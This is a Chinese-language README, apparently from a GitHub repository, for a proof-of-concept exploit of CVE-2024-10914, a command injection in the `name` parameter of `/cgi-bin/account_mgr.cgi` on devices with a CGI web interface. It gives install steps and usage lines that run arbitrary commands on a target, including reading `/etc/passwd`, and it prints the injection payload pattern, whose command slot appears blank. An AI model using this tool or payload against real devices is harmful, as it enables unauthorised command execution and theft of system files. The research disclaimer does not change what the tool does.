0xSS3K/CVE-2024-10914__POC

# CVE-2024-10914 - 概念验证 针对 `/cgi-bin/account_mgr.cgi` endpoint 命令注入漏洞的 exploit。该漏洞允许通过未过滤的参数在受影响的系统上执行任意命令。 ## 漏洞描述 CVE-2024-10914 是一个命令注入漏洞，影响带有 CGI Web 界面的设备。该易受攻击的应用程序未正确验证 `cgi_user_add` 请求中的 `name` 参数，允许攻击者注入将以应用程序权限执行的系统命令。 ## 环境要求 - Python 3.7+ - requests 库 ## 安装说明 克隆仓库并安装依赖： ``` git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git cd CVE-2024-10914__POC pip install -r requirements.txt ``` 或手动安装： ``` pip install requests ``` ## 使用说明 该脚本提供两个参数： ``` python CVE-2024-10914_EXPLOIT.py -u -c ``` ### 参数说明 - `-u, --url`（必需）：目标 URL（例如：http://192.168.1.1） - `-c, --command`（可选）：要执行的命令（默认：id） ### 示例 执行 `id` 命令： ``` python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 ``` 执行自定义命令： ``` python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd" ``` 列出文件： ``` python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp" ``` ## 技术原理 该 exploit 向存在漏洞的 endpoint 发送带有以下 payload 的 GET 请求： ``` /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; ; " ``` 空字符串以引号闭合，随后注入所需的命令，该命令将在服务器上下文中执行。 ## 响应结果 脚本将显示： - 连接状态 - 发送的 payload - HTTP 状态码 - 服务器的完整响应 ## 法律警告 此代码仅出于教育和安全研究目的提供。仅应在获得明确授权的系统上使用。未经授权使用此 exploit 可能违反当地法律并构成犯罪。作者不对滥用此工具的行为承担责任。 ## 参考资料 - CVE-2024-10914 - CVSS 评分：待定 ## 作者 SS3K ## 许可证 未指定

标签：CISA项目, PoC, Python, 命令注入, 安全, 无后门, 暴力破解, 超时处理, 逆向工具